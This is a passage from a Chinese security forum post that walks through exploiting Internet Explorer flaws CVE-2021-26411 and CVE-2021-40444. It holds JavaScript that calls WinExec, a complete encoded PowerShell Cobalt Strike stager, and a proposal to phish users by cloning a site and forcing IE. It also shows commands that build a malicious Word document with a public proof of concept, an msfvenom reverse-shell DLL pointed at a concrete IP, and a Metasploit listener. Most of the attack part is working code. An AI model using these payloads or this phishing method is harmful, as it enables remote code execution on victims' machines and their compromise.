  3. var WinExec = getProcAddr(kernel32,'WinExec')
  4. call2(WinExec,[newStr('calc.exe'),5])
复制代码


这里是通过WinExec这个API函数进行的命令执行,既然如此我们也可以利用WinExec去执行cmd命令。关于WinExec如何使用可以参考:https://docs.microsoft.com/zh-cn ... /nf-winbase-winexec
把calc.exe替换为whoami命令
  1. <pre style="padding: 16px;font-variant-numeric: normal;font-variant-east-asian: normal;font-stretch: normal;font-size: 12.75px;line-height: 1.6;font-family: Consolas, &quot;Liberation Mono&quot;, Menlo, Courier, monospace;border-radius: 3px;word-break: normal;overflow-wrap: normal;white-space: pre-wrap;background-color: rgb(247, 247, 247);border-width: 1px;border-style: solid;border-color: rgba(0, 0, 0, 0.15);box-sizing: border-box;overflow: auto;"><span style="box-sizing: border-box;color: rgb(143, 89, 2);font-style: italic;">// 调用API,利用cmd执行net user命令</span>
  2. <span style="box-sizing: border-box;color: rgb(0, 0, 0);">var</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">kernel32</span> <span style="box-sizing: border-box;color: rgb(206, 92, 0);font-weight: bold;">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">call2</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">(</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">LoadLibraryExA</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">,[</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">newStr</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">(</span><span style="box-sizing: border-box;">'</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">kernel32</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">.</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">dll</span><span style="box-sizing: border-box;">'</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">,</span><span style="box-sizing: border-box;color: rgb(0, 0, 207);font-weight: bold;">0</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">,</span><span style="box-sizing: border-box;color: rgb(0, 0, 207);font-weight: bold;">1</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">)])</span>
  3. <span style="box-sizing: border-box;color: rgb(0, 0, 0);">var</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">WinExec</span> <span style="box-sizing: border-box;color: rgb(206, 92, 0);font-weight: bold;">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">getProcAddr</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">(</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">kernel32</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">,</span><span style="box-sizing: border-box;">'</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">WinExec</span><span style="box-sizing: border-box;">'</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">)</span>
  4. <span style="box-sizing: border-box;color: rgb(0, 0, 0);">call2</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">(</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">WinExec</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">,[</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">newStr</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">(</span><span style="box-sizing: border-box;">'</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">cmd</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">.</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">exe</span> <span style="box-sizing: border-box;color: rgb(206, 92, 0);font-weight: bold;">/</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">k</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">whoami</span><span style="box-sizing: border-box;">'</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">),</span><span style="box-sizing: border-box;color: rgb(0, 0, 207);font-weight: bold;">5</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-weight: bold;">])</span></pre>
复制代码



3.1.6 实战利用既然可以通过IE远程执行cmd命令,那么也就可以通过cmd调用powershell command上线CS,话不多说试一下(这里没有做免杀)
  1. // 调用API,利用cmd执行net user命令
  2. var kernel32 = call2(LoadLibraryExA,[newStr('kernel32.dll',0,1)])
  3. var WinExec = getProcAddr(kernel32,'WinExec')
  4. call2(WinExec,[newStr('cmd.exe /k powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAWABhADQALwBpAE8AaABMADkAMwBQAHkASwBmAEcAZwBKAG8AcQBHADUAUQBLAEEAZgBzAHgAcABwAGsAawBBAGcAUQBOAEoAQQBlAEgATgBSAHkAOQBnAG0AaABNADYATAB4AEMARwBFAE8ALwBQAGYAdAB4AEsAZwBiADgAOQBPAHoAKwA1AEkAdQA0AHMAVQA0AGQAaABWADUAYQBwAFQAeAArAFcASwBRAGQAbQBkAHcAUQBJAEwATQA4ADAAagBsAEwAdQBiADAAQwBDADAAUABKAGUAcgA1AG4ASwAzAEQAVQA5AGwAMwBCAGYAdQBhAHoANgAzAGkAVgB6AE0AMAB1AGwAMAA4AEcASgBTADkAdQBJAEgASABuADUAQgBoAEEAUQAwAEQATABtAC8AYwBqAGQAOQBGAEMAQwBIAEsAOQB3AGUAVQBQAEQAaQBlAEMAUwB5AGEAWgBIAEwAWABsAEoAQgBTAHEASwBBADgAagBjADMAdQBaAHQAcwBLAG4ASgBEAHQASwBFAHYATABtAEwAVwBnAGIANAA0AGwARwAwADkARQBzAEoARwBoAGEAWABvACsAdwAzAFAAUQBaAGEANwArAHYAeABaAGoAbwBLAEEAdQB1AHoAOABYAG0AcABSAEoAbwBZAGgAZABkAGEAMgBSAGMATQBDAHoAMwAzAGoAcABsAHMAYQAwAEwAdgBuADkAWQA1AGkAeAB2ADMARgAzAGIANgBVAFcAcgBhADMAUgB2AFoARgBMAEoARQBSADMAawBKAEEAbwBrAHYAUwB0AFoANgBIAFUAUgBwAEIAeQBmAEIAdABpAHgAWAB5AGYALwA2AFoANQA1AGQAMwBsAFYAVwBwAHUAWQArAFEASABSAGIAeQBSAGgASQB5ADYAcABTAEkAYgBlAGQANQA3AGoAdQBmAGIAagBoAEsAZgBGAHIASQBhAHgAWQBPAHYATgBEAGIAcwBOAEwAVQBjAG8AVgBxAGEAWgB4ADUAcgAyAGYATwBhADIAZgBmADgALwB3AGwATQB0AE4ASABFAE0AZQB2AGcAMAB5AHQAbgBuAFUASwBlAFIAagAyAEEAUgB2AHgAagBHAEcAKwB5AEMAMwBUAC8AWgBhAHIARgBmAGYAMQB6AFoAdABoADUARABMAEwAbwBTAFgAVgBaAFQAVAB3AGYASQBNAEcAQgB3AHYAVABzAE4AUgBHAEwAcgBIAHAAawBHADUAQQBMAFIAOQBDACsAbAB3AHoAegA0AE0AVABBAFcAVgBSADQASABKAFgAWAAwAEQAdgA0AEwAMwBTAHcAcQAwAGIAMgBYAFkAUgA3AEMANQAvADEAKwA2AHEAbwBOAFAANABDAHUANwB2AEsAaABYAGUASwA0AEYAVQBuAHcAVgA4ADgAYwBLAEoAMwA0AEYARAB5ADMAaAB6AE4AZwBmAGgALwBPAFQAOQBPADMATAB4ADgAUAB1AEoAWQBIAHoAdQBlACsANABEAHEAaABKAHEAVQB4AE0AeAArAHMASQBBADMAMwBkAGMAegBkADMAYwBMAEwATQBoAGgAWABnAEsAZgBTACsAMABNAHIAMAB2AFgATABuAEkAYQBlAEEARQBZAGwANgBRAHAATwBrAGMAQgBSAEgAbABWADMALwBuADUANwB6AHQAVgBUAE0AcwAvAHQASgBRADUAYQBwADEAMABUAG0AbgA1ACsAegBIAEYAMgA0ADUAOABTAHkAeQB5AHQAMwB3AHUAUQB0ADcAMAB2AG0AWABkAFcAVABaAGgAQQBiAHAAKwBxADkAUABRADQATgB1AEwASgBjADIARQBoAGMANQBGAHIANABTAHYAdgBCAFIAegB1AGoARwBwAGgAawBlAHAAYQB1AFkARABuADQAVwA4AHAAYwBGAFMAaABvAFgAZABQAEkAcABvAE0AdQBmADEAWgBxAE8AeABkADUAMABwAGIATgB6AEkAbwBhADgAaAArAEEAVgBVAEkATAAvADAAWgBsAHoARABnAHQANQAxAGQAVwBvAEEALwBpAGQAMwA0AEcAbQB0AHgAcwA0AFoAdgBRAHEAZgBUAGwAYQB5AFgAWAAzADkARAAzAGwAcwBtAHkAagBNAEMAeAB5AC8AUQBqAE8ATwBTADUAeQBCAGsAVQAyAEoAVQBWAE8AZABFAFAAcgBzAGkAUgBHAHoATQB1AEcAKwBiAC8AZAAxAFMASwBiAFcAUgBpAEYANwBHAHAAdQB4AFgAOABBADYAVwBWAHIAMgBYAFAAaAB4AEUAUQBZAHMAZwBzAHcAagBBAHkAZgBZAGcAdgBaAEsAUwBwAEYAcgBtADAAUgBLAGkAVwBHAFoAVgA1AGQAeQBIACsASQBpAFkAeABzAEcANAA0AGMAVwBEAHAAQQBUAG0AQQBtAHgAYwBKAGcASwBXAGMAQwBVAHYAeABYAGYAdgBBAGwAZwB6AEwAVgA4AFcAMwBxAGcASABSAFcAaABSAFEAYgBtAFYAQgB6AEwAaQBjAHEAbwB4AHMAeQBLAGMAbgAvAEcANwBlAHYANQArAFIAOABLAEYASwBzAHIAaQBDADkAYwB4AG8ASQBZAE4AZwBlAEsAMwBJAFQASwAyAEIAUQAxAC8ATABGAG4ANABqADMAMwA3AG4AMwBZADQAbgA1AHcAVQAwADUAbwBKAGQARQBGAHIASwBEAHUASgBRAFMAbABoADYAWABUAEIASwBuAGwAOAB1AFgATgB5AHcAegA1AEEASQBHAHEAQwBtAEIANQAwAGcAbwBwAFAAYwAxAEkAeQB0AGoAaABiAHoAdwBHAE8AMwBWAFIATgBzAE4ANwBvAE4AVwA4ADYAQwAwADkAKwAzAG0AQwBKADQARABQAE0ASgBlAGEAZgBaADYAbgBhAEUAdgBEAFgAdQA0AEcAVAAzADMAMgArAFgATwBSAGgAMAA4AE4AbQBwAFIASABLAG4AUgBTAEMAbwBMAFMAaABuAGsAVAB2AHQAVwBjADYATQBlAG4AcgAxADUASgBYAEoAcQBGAGUASwByAEIAeAAzAG0AdwBvAGQAOQBPADIAeQBvAGgANABiAFkAcgB1ADQAOQA1AGQANgAwAG4AaQA1ADIAegB2AHEARABkAFYAeABaAHoAMQBUAGwAWQBkADEAUwBhAHUAMQBKAHEASwBUAHkAYgBmAFUAZwBLAFgAdgA1AHkAWQBQAHgASAArAHAAQgA5AGoAcQBnADkAMwBqAHYAdQAxAEoATQBhAHIAVABaAHUAYQBlAHoASABvADQARgA5AGsAaQBSAGUAVQB5ADYAawAwADkARwB1AGQASwBhAEoASABwAHYAMAB2AFIAMQB3AHkAVwA5AGQAVwBXAGcAZABQAFIAVAB0AGMAbQBPAFoAZABJAGUAbABrAGsAegBYAEoARABKAHYAaQBuADAAMQAxADAAZgA0AGwAUQBGADAANwBoADMATwA0AGwAaABTAEEAbAArAGoAUgA3ADYAcwByAGIARABiAGIAMQBIAHUAdgB2AEgATwBqAGwAVgBFADAAVwB2AEEAUQA1AEgASQA5AEcAMgA4ADMAdAB5AHgARABNAGwAeABqAE8AOQBsADcAVABuAGUAZwB2AHMANwBxAE8AcABXAFcAdAByAGgAZwBDADIARABYAEsATQB5AFQAaAA4ADcAbwB6AFkAWABPAGcAagBwADUAWQBrAGIAawAxAFcAZAArAHEAeABoADMAMAAyAG0AWABYAHUAQQA1AFQASQBmAHMAKwBpAGEAMgBuAEQAVQB0ADEATwBiADIARgAyAG4AcAByAHMANwBKADkAaABEAEIATQBDAHQAdQAzADIAcQBOAEUARgAyADYANgBzAGEAWgBBAEwAVgBGAGYAbwBHAEcAUwA2AG8AUQBXADIASABvAE8AOQBhAG0AbQA3ADUASAA2AEgAQgBUADMAVwBsAEQARwBwAGcAMgAvAFQAdABkAGcANQBTAFkANQB1AFkAYwBHAGMAYgBRAFMAOQBUAG8ALwB6AG0AUwB6AG8AVAAvAEoAMgBhAE0ANQBGAGIAegB3AHoAaQBZAE0AYwB5AGMASwBEAGUAawB5AHEASABiAGEAbwBkAG8ANgBMAHUARwA2AHQAWgAyAFIAUABwAHYANgBSAHUATwBJAHoAcQBTADUAaQBFAHQAZAB0ADUARAB3ADUAbwBrAGsAQwB1AFIAVgAyADEATwBNAGkARgBGADIAdABwAFEAcQBMAHcAZABCAHUAUABzADkAZgBoADYAMwBSAEIAQwAvAEUAYQBsADIAYgBqAHYAMwArAHEASwB4AHEAaQBsAGsAZQBpAFQARQBUAFIAOAAzADYAYQBHAEMAVAA3AG0ARAA4ADEARwBxAEoAZQBvAFIAYgB2AGkATQBlAFAAYgAxADUATgBCAHMARQA4AGoARQBzAEgAOABkAGoAVQBXAGMAawAxAGkAYQBOAG8AVABvAFgAaABXAEYASQBwAFAARQBNAFoASQBYAHgAMgBHADgAUABYAHkAdQB6AGgAagBUAFAANQBOAGQATwA1AHoAQgB2ADIAYgBGAHMAMQBmAHkAcgBEAC8ATgBxADUAMABRAGwAOABnAGMAVwA3AEEAZABsAGkAMwB0AFkASwBIAGUAVgBsAG0AUgBDAGoARgBTAHEATAB2AGIAegBWAHUAZgBZAGMAQwBWAGgANwBsAFQAYwB1AGEAdQA0AEQAYQBmAEQAUwBOAFcAdgBJAEYAZQBwAFkAcgBFAHUATABHAEMAdAA0AFUAegAyADYAKwBwAGMAbABxAHEAaABpAHUATABYAG4AZQBMAEUATQBvADQAWAB1ADcAbQByADEAeABUAGgANgBVAFIAbgA0AFYAUwBKADIAVwBrAHoAOABNAGIAegBsAHQAaABWAGcASQBzAEwAeAB6AGYAbgBiAHYATQBaAHQANABtADEAbgBoAEkATABUAC8ARQB6ADcAQwBFAGcAZAA3AEwASABzADAAWABjAGMASQBtAEQAMgAvAGgANQBNAGYAVQBQAEMAMQBOAHQAbwAzAGcAYgB5AE0AYgAvAFAAeQBkAHoANABIAG0ANQBqAGkAUQBDAFAARABXAG0AZQBrADgAOQBBAFoALwBMADQAVQA2AHQAYQBqAHYAUwBaAEEAOQBiAG8AZABFAEMASABzAFkATwA4AEEAVgA0AFoASAAxAHkATwAvAEUAKwBCAEoANABtAFcAawBOAE4AOQBKAFMAcgBSADQAWQBDAEsAZQBOAHEAWgBXAFAAdgA1AFkARgBWADYANgA1ADMAawAzAEQAeABVAE4ATwBpAHIAcwBCAE8AdQBMAGwAVgBSADQAMABoAGgAawBjAGQASwBHAEoANQBvAGkAUwBaAHIAVgAxAGEAagBUAFoAZQBBAFAAMwBGAE0AYgAyAHoALwA4AEgAQgAvADUAMwBOAHUATABkADYAQQAxAFUARwBDAGwAZwA2AC8AKwBrAFQAbgA5ADcANwBiAHkAdgBMADIAKwBQAHEAMgBxAGUAOQB2AGQAKwB0AGoAMgBCAE4AcQBLAGUAMQBLADEAcwA1AG8ASABjAFYANgAxAGYATgBqADQAYQBDAGMASQB0AHMAcQBHAFQAUQB3AEYAeQB2AEgAOABVAEwAbABFAHMAYgAwAHYAZQBzAFYASwBOAFEAKwBMAGgAegBmAHEAVwBCAFMAMgAzAG8ASwBxAEgAdgB2AEIAWgB0ADAAYgBZADkAbgBEAFoATwB2ACsAaABnAG8ASQAwADcATgAxAGMAcgB1AEoAegBHAE0AQgBTAHEASAA0ADUANAA3AGsAMABRAHUAcQBWAHoAVABPAHQAbwBzADgAbQBhAGkAMAB1AEUAMQB4ADcAcgBLAHYAagA1ADgAdwBMAEMASwA3ADQARABzAFUAZABkAGsAMgAyAEwAWABQAGsAbwBsAE0AdgBsADkATAA5AFcANQBuAE8ALwBEADQAdgBzACsAVQBuAGgAegBWAHcAeABiAGEANwBlAGUAZgBKACsASgB6AHYAYgBpAGIAKwBnAEgAMABTAHUAUQAvACsASABDAGYAaABoADAALwA4AE0AYgBRAHAAZQAxAHAAKwA5AFEAWgBjADUAOQBEAEYAZQBmAEMANwAvAE4AWgBkAFQATgA5AHkANwArAGQAQQA2AHcAZABjAEgAMwBYAE8AUABHAGYAZABDAG8ARABtADcAMgAzAGwAcgArAEYAVABKADcAdAA3AEMATABlAEkANQB0AFQAbgBqAGIAaABIADMAbgBiAHUARAA4AE0AUgBRAHEATQBMADMAUwBtAEIARwA2AFUAWABNAG4AVAArAC8AdgBuAEUAeABzAHMANgBLADMANwBnAGgAeABSAFQAYQA1ADcAdQBPAHQAdwBhAFcAVQB1AGkAbgBVAHQATwBaAGsAVgBRAFkANQB2ADQASgBEAGwANABaAEEAcwA4AE4AQQBBAEEAPQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA=='),5])
复制代码



成功上线
这是不是也可以算是一种新型的钓鱼方式呢,克隆目标网站;给克隆的站新增一个弹框提示网站只允许IE浏览器打开,这样就可以利用CVE-2021-26411漏洞来进行CS上线了
3.2 CVE-2021-40444(IE浏览器代码执行)3.2.1 漏洞简介Microsoft MSHTML 远程代码执行漏洞,攻击者可通过制作恶意的 ActiveX 控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行任意代码。微软在通告中指出已检测到该漏洞被在野利用,请相关用户采取措施进行防护。
MSHTML(又称为Trident)是微软旗下的Internet Explorer 浏览器引擎,也用于 Office 应用程序,以在Word、Excel 或 PowerPoint 文档中呈现 Web 托管的内容。AcitveX控件是微软COM架构下的产物,在Windows的Office套件、IE浏览器中有广泛的应用,利用ActiveX控件即可与MSHTML组件进行交互。
3.2.2 影响范围影响的版本非常广,可以看到,基本上windows全系列都受到这个漏洞的影响。其载体是ActiveX控件,该控件可以通过Office 的word、Excel、PowerPoint或IE等来加载。
  1. Windows Server, version 20H2 (Server Core Installation)
  2. Windows Server, version 2004 (Server Core installation)
  3. Windows Server 2022 (Server Core installation)
  4. Windows Server 2022
  5. Windows Server 2019  (Server Core installation)
  6. Windows Server 2019
  7. Windows Server 2016  (Server Core installation)
  8. Windows Server 2016
  9. Windows Server 2012 R2 (Server Core installation)
  10. Windows Server 2012 R2
  11. Windows Server 2012 (Server Core installation)
  12. Windows Server 2012
  13. Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  14. Windows Server 2008 for x64-based Systems Service Pack 2
  15. Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  16. Windows Server 2008 for 32-bit Systems Service Pack 2
  17. Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  18. Windows Server 2008 R2 for x64-based Systems Service Pack 1
  19. Windows RT 8.1
  20. Windows 8.1 for x64-based systems
  21. Windows 8.1 for 32-bit systems
  22. Windows 7 for x64-based Systems Service Pack 1
  23. Windows 7 for 32-bit Systems Service Pack 1
  24. Windows 10 for x64-based Systems
  25. Windows 10 for 32-bit Systems
  26. Windows 10 Version 21H1 for x64-based Systems
  27. Windows 10 Version 21H1 f
复制代码


3.2.3 利用条件
  1. //IE利用条件
  2. Internet Explorer 中启用ActiveX控件和插件

  4. //office利用条件
  5. office(Word、Excel、PowerPoint)可以直接利用
复制代码


3.2.4 漏洞复现从Github上找了一份POC
  1. <pre>https://github.com/lockedbyte/CVE-2021-40444
  2. </pre>

复制代码

漏洞利用之前要先安装lcab库
  1. wget http://ftp.debian.org/debian/pool/main/l/lcab/lcab_1.0b12.orig.tar.gz
  2. tar zxvf lcab_1.0b12.orig.tar.gz
  3. cd lcab-1.0b12
  4. ./configure
  5. make
  6. sudo make install
复制代码



能够执行lcab就安装成功了
将Github上的poc上传到服务器下

执行下面这个命令
  1. python3 exploit.py generate test/calc.dll http://vps的ip:8088
复制代码


可以看到其利用的是test/calc.dll这个生成好的dll,其实我们可以生成自己的dll

可以看到在/out/目录下生成了一个document.docx的文件,这个就是主要的用来执行命令的恶意文件。

开启http服务
  1. python3 exploit.py host 8088
复制代码



将生成的document.docx拷贝到靶机,双击打开,可以成功弹出计算器

可以看到其是远程加载word.html文件

看一下服务器上记录的日志,如下所示:

3.2.5 POC分析将刚才生成的document.docx解压以后可以看到其文件结构:

在word/_rels中有个document.xml.rels的文件,其内容中有调用的url

​​

在这里调用了word.html文件,这样的话我们也可以直接利用IE浏览器来访问相关的URL,不过IE默认拦截,需要手工启用才行,启用以后相关截图如下所示。

直接使用IE浏览器访问word.html,也可以成功命令执行

3.2.6 MSF上线生成DLL文件
  1. <pre>msfvenom -p windows/meterpreter/reverse_tcp LHOST=110.40.137.64 LPORT=2345 -f dll > 2.dll</pre>

  3. <p><span aria-label=" 图像 小部件" class="cke_widget_wrapper cke_widget_inline cke_widget_image cke_image_nocaption cke_widget_selected" data-cke-display-name="图像" data-cke-filter="off" data-cke-widget-id="429" data-cke-widget-wrapper="1" role="region" tabindex="-1" contenteditable="false"><img alt="" class="cke_widget_element" data-cke-saved-src="https://img-blog.csdnimg.cn/951e09f806b544dd9ebad9d21faa9074.gif" data-cke-widget-data="%7B%22hasCaption%22%3Afalse%2C%22src%22%3A%22https%3A%2F%2Fimg-blog.csdnimg.cn%2F951e09f806b544dd9ebad9d21faa9074.gif%22%2C%22alt%22%3A%22%22%2C%22width%22%3A%221%22%2C%22height%22%3A%221%22%2C%22lock%22%3Atrue%2C%22align%22%3A%22none%22%2C%22classes%22%3Anull%7D" data-cke-widget-keep-attr="0" data-cke-widget-upcasted="1" data-widget="image" src="https://img-blog.csdnimg.cn/951e09f806b544dd9ebad9d21faa9074.gif" width="1" height="1"><span class="cke_reset cke_widget_drag_handler_container" style="background:rgba(220,220,220,0.5);background-image:url(https://csdnimg.cn/release/blog_editor_html/release1.9.5/ckeditor/plugins/widget/images/handle.png);display:none;"><img class="cke_reset cke_widget_drag_handler" data-cke-widget-drag-handler="1" draggable="true" role="presentation" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" title="点击并拖拽以移动" width="15" height="15"></span><span class="cke_image_resizer" title="点击并拖拽以改变尺寸">​</span></span></p>
复制代码


环境配置
  1. python3 exploit.py generate test/calc.dll http://x.x.x.x
  2. python3 exploit.py host 80
复制代码



设置监听
  1. use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp
复制代码



成功反弹shell





回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-23 11:15 , Processed in 0.018049 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表